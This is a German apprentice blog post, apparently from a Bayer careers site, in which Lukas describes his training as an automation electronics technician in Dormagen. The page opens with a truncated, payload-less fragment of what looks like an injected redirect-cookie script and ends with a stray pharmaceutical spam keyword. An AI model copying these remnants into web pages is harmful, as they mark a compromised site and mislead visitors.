=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')} "/>

Austausch Ihrer personenbezogenen Daten mit Facebook


Wenn Sie auf "Akzeptieren" klicken, wird ein Programm von Facebook geladen und ausgeführt. Dabei können auf Ihre Person bezogene Daten an Facebook übermittelt und dort gespeichert sowie seitens Facebook Cookies auf Ihrem Rechner gesetzt und gelesen werden.
Bayer hat keinen Einfluss auf Art und Umfang der Daten, die so von Facebook erhoben werden können.
Wenn Sie auf "Ablehnen"klicken, wird das Programm nicht geladen und keine personenbezogene Daten an Facebook übertragen.
Details hierzu entnehmen Sie bitte der Datenschutzerklärung von Facebook.

Ablehnen Akzeptieren

Austausch Ihrer personenbezogenen Daten mit Google


Wenn Sie auf "Akzeptieren" klicken, wird ein Programm von Google geladen und ausgeführt. Dabei können auf Ihre Person bezogene Daten an Google übermittelt und dort gespeichert sowie seitens Google Cookies auf Ihrem Rechner gesetzt und gelesen werden.
Bayer hat keinen Einfluss auf Art und Umfang der Daten, die so von Google erhoben werden können.
Wenn Sie auf "Ablehnen"klicken, wird das Programm nicht geladen und keine personenbezogene Daten an Google übertragen.
Details hierzu entnehmen Sie bitte der Datenschutzerklärung von Google.

Ablehnen Akzeptieren

Austausch Ihrer personenbezogenen Daten mit YouTube


Wenn Sie auf "Akzeptieren" klicken, wird ein Programm von YouTube geladen und ausgeführt. Dabei können auf Ihre Person bezogene Daten an YouTube übermittelt und dort gespeichert sowie seitens YouTube Cookies auf Ihrem Rechner gesetzt und gelesen werden.
Bayer hat keinen Einfluss auf Art und Umfang der Daten, die so von YouTube erhoben werden können.
Wenn Sie auf "Ablehnen"klicken, wird das Programm nicht geladen und keine personenbezogene Daten an YouTube übertragen.
Details hierzu entnehmen Sie bitte der Datenschutzerklärung von YouTube.

Ablehnen Akzeptieren

Startseite » Auszubildende » Meine Ausbildung zum Elektroniker für Automatisierungstechnik(EAT)
Meine Ausbildung zum Elektroniker für Automatisierungstechnik(EAT)

Meine Ausbildung zum Elektroniker für Automatisierungstechnik(EAT)

Hallo Leute!

Ich heiße Lukas und bin 19 Jahre alt. Die Ausbildung zum Elektroniker für Automatisierungstechnik (kurz ‚EAT‘) habe ich im Sommer 2017 in Dormagen begonnen und bin jetzt im zweiten Lehrjahr.

Meine Entscheidung für die Ausbildung zum EAT

Nach der 11. UnbenanntKlasse auf dem Gymnasium und drei erfolgreichen Praktika im Handwerk, wusste ich, dass ich nicht weiter zur Schule gehen, sondern eine Ausbildung anfangen möchte. Mir war ziemlich schnell klar, dass ich etwas mit Elektronik machen wollte, da ich immer viel Spaß dabei hatte, an elektrischen Geräten „rumzuschrauben“. Ich habe mich im Internet informiert, welche Ausbildungsmöglichkeiten für die Fachrichtung Elektronik existieren und bin dabei auf den Elektroniker für Automatisierungstechnik gestoßen. Die Jobbeschreibung klang ziemlich genau nach dem, was ich gerne machen wollte.

Da Bayer im Rheinland einer der größten und bekanntesten Arbeitgeber ist, stand für mich schnell fest, dass ich die Ausbildung bei Bayer absolvieren möchte. Leider war ich 2016 etwas zu spät mit meiner Bewerbung dran, sodass die Ausbildungsplätze bereits alle vergeben waren. Deshalb habe ich beschlossen, zunächst am Bayer ‚Starthilfe-Programm‘ teilzunehmen. Das ist eine einjährige, berufsvorbereitende Maßnahme, die Bayer anbietet, um sich als Unentschlossener oder Orientierung-suchender Schulabgänger auf eine Ausbildung im Unternehmen vorzubereiten. Ein zweites Mal wollte ich die Bewerbungsfrist aber nicht verpassen – also habe ich meine Bewerbung für das folgende Jahr zeitnah eingereicht und wurde glücklicherweise angenommen.

Aber jetzt zu meiner Ausbildung!

Die Ausbildung ist in drei Teile untergliedert: Berufsschule, Ausbildungswerkstatt und Betriebseinsätze.

In der Berufsschule lernt man das theoretische Wissen, das man für den Alltag als Elektroniker und natürlich die Prüfungen während der Ausbildung braucht. In der Berufsschule liegt natürlich Elektrotechnik, mit Schwerpunkten wie zum Beispiel Motoren-, Steuerungs- und Sicherheitstechnik, im Mittelpunkt. Daneben werden Fächer wie Politik, Wirtschaft, Deutsch und Englisch – aber auch Sport – unterrichtet.

Die Ausbildungswerkstatt gibt einem dann die Möglichkeit, das theoretische Wissen, anhand von praxisbezogenen Aufgaben und Versuchsaufbauten, besser zu verstehen und zu vertiefen. Hierzu haben wir zum Beispiel in der Ausbildungswerkstatt ein Versuchsgestell mit einer Mess- und Regelstrecke in Betrieb genommen. Wir haben die einzelnen Mess- und Regelarmaturen mit ihren Funktions- und Messprinzipien besprochen und konnten so den Ablauf der Steuerung nachverfolgen und verstehen.

In den Betriebseinsätzen kann man nicht nur das Wissen aus Berufsschule und Lehrwerkstatt praktisch anwenden, sondern erhält auch interessante Einblicke in einen potentiell zukünftigen Arbeitsplatz. Im Austausch mit Fachkollegen lernt man auch die anderen Berufsfelder kennen und erfährt, wie man mit ihnen zusammenarbeitet.

Meine Highlights in der Ausbildung

Zu meinen persönlichen Highlights gehört der Lukas - Bild 2_bearbeitetBesuch von Fachseminaren und -messen mit der gesamten Ausbildungsgruppe und unserem Ausbilder. So haben wir die Möglichkeit, innovative Techniken kennenzulernen und unser Fachwissen zu vertiefen.

Solche gemeinsamen Events oder Teambildungsmaßnahmen – zu Beginn und während der Ausbildung – finde ich wichtig und gut für den Zusammenhalt der Ausbildungsgruppe.

Mir gefällt außerdem die Vielfältigkeit in der Ausbildung – aber auch innerhalb unserer Ausbildungsgruppe. Bei uns kommen nämlich Auszubildende aus mehreren Chempark-Unternehmen zusammen. Dadurch treffen wir auf Azubis aus verschiedenen technischen Berufen und erhalten so persönliche Erfahrungsberichte aus den unterschiedlichsten Produktions- und Dienstleistungsbereichen.

Insgesamt fühle ich mich sehr wohl in der Ausbildung in Dormagen, denn Dormagen ist meiner Meinung nach ein sehr innovativer Standort mit einer guten Infrastruktur – sowohl für berufliche als auch private Belange.

Viel Erfolg!

Lukas

Allgemeine Nutzungsbedingungen Datenschutzerklärung Impressum Technische Hinweise
Austausch Ihrer personenbezogenen Daten mit Facebook
Wenn Sie auf “Akzeptieren” klicken, wird ein Programm von Facebook geladen und ausgeführt. Dabei können auf Ihre Person bezogene Daten an Facebook übermittelt und dort gespeichert sowie seitens Facebook Cookies auf Ihrem Rechner gesetzt und gelesen werden.

Bayer hat keinen Einfluss auf Art und Umfang der Daten, die so von Facebook erhoben werden können.

Wenn Sie auf “Ablehnen” klicken, wird das Programm nicht geladen und keine personenbezogene Daten an Facebook übertragen.

Details hierzu entnehmen Sie bitte der Datenschutzerklärung von Facebook.

×
Austausch Ihrer personenbezogenen Daten mit Google
Wenn Sie auf “Akzeptieren” klicken, wird ein Programm von Google geladen und ausgeführt. Dabei können auf Ihre Person bezogene Daten an Google übermittelt und dort gespeichert sowie seitens Google Cookies auf Ihrem Rechner gesetzt und gelesen werden.

Bayer hat keinen Einfluss auf Art und Umfang der Daten, die so von Google erhoben werden können.

Wenn Sie auf “Ablehnen” klicken, wird das Programm nicht geladen und keine personenbezogene Daten an Google übertragen.

Details hierzu entnehmen Sie bitte der Datenschutzerklärung von Google.

×
Austausch Ihrer personenbezogenen Daten mit YouTube
Wenn Sie auf “Akzeptieren” klicken, wird ein Programm von YouTube geladen und ausgeführt. Dabei können auf Ihre Person bezogene Daten an YouTube übermittelt und dort gespeichert sowie seitens YouTube Cookies auf Ihrem Rechner gesetzt und gelesen werden.

Bayer hat keinen Einfluss auf Art und Umfang der Daten, die so von YouTube erhoben werden können.

Wenn Sie auf “Ablehnen” klicken, wird das Programm nicht geladen und keine personenbezogene Daten an YouTube übertragen.

Details hierzu entnehmen Sie bitte der Datenschutzerklärung von YouTube.

×
potenzmittel